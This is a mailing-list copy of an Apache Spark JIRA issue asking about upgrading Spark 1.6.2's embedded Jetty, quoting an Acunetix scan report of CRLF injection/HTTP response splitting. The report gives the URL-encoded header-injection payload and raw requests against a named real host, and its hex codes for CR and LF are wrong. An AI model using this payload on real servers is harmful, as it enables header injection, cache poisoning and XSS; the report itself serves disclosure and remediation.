You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@spark.apache.org by "Jerry Garcia (JIRA)" <ji...@apache.org> on 2019/03/15 04:14:00 UTC

[jira] [Updated] (SPARK-27172) CRLF Injection/HTTP response splitting on spark embedded jetty servlet.

     [ https://issues.apache.org/jira/browse/SPARK-27172?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jerry Garcia updated SPARK-27172:
---------------------------------
    Description: 
Can we upgrade embedded jetty servlet on spark 1.6.2? Is this possible or will there be any impact if we do upgrade it ?

Please do refer on the provided attachment for more information.
 

  was:
Can we upgrade embedded jetty servlet on spark 1.6.2? Is this possible or will there be any impact if we do upgrade it ?

Please do refer on the provided attachment for more information.
|CVS|Severity|Description|Impact|Recommendation|Affected|Reference:|
|CRLF injection/HTTP response splitting|Medium|This script is possibly vulnerable to CRLF injection attacks.
HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.|Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies or HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation.|You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.|Web Server
Details
URL encoded GET input page was set to %c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs
Injected header found:
SomeCustomInjectedHeader: injected_by_wvs
Request headers
GET /?page=%c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs&showIncomplete=false HTTP/1.1
Referer: https://app30.goldmine.bdo.com.ph
Host: app30.goldmine.bdo.com.ph
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Acunetix-Product: WVS/11.0 (Acunetix - WVSE)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
 
 
Web Server
Details
URL encoded GET input showIncomplete was set to %c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs
 
Injected header found:
SomeCustomInjectedHeader: injected_by_wvs
Request headers
GET /?page=3&showIncomplete=%c4%8d%c4%8aSomeCustomInjectedHeader:%20injected_by_wvs HTTP/1.1
Referer: https://app30.goldmine.bdo.com.ph
Host: app30.goldmine.bdo.com.ph
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Acunetix-Product: WVS/11.0 (Acunetix - WVSE)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*|Acunetix CRLF Injection Attack (http://www.acunetix.com/websitesecurity/crlf-injection.htm)
 
Whitepaper - HTTP Response Splitting (http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf)
 
Introduction to HTTP Response Splitting (http://www.securiteam.com/securityreviews/5WP0E2KFGK.html)
 
https://www.cvedetails.com/cve/CVE-2007-5615/
 
https://cwe.mitre.org/data/definitions/113.html|


> CRLF Injection/HTTP response splitting on spark embedded jetty servlet.
> -----------------------------------------------------------------------
>
>                 Key: SPARK-27172
>                 URL: https://issues.apache.org/jira/browse/SPARK-27172
>             Project: Spark
>          Issue Type: Question
>          Components: Web UI
>    Affects Versions: 1.6.2
>            Reporter: Jerry Garcia
>            Priority: Major
>
> Can we upgrade embedded jetty servlet on spark 1.6.2? Is this possible or will there be any impact if we do upgrade it ?
> Please do refer on the provided attachment for more information.
>  



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org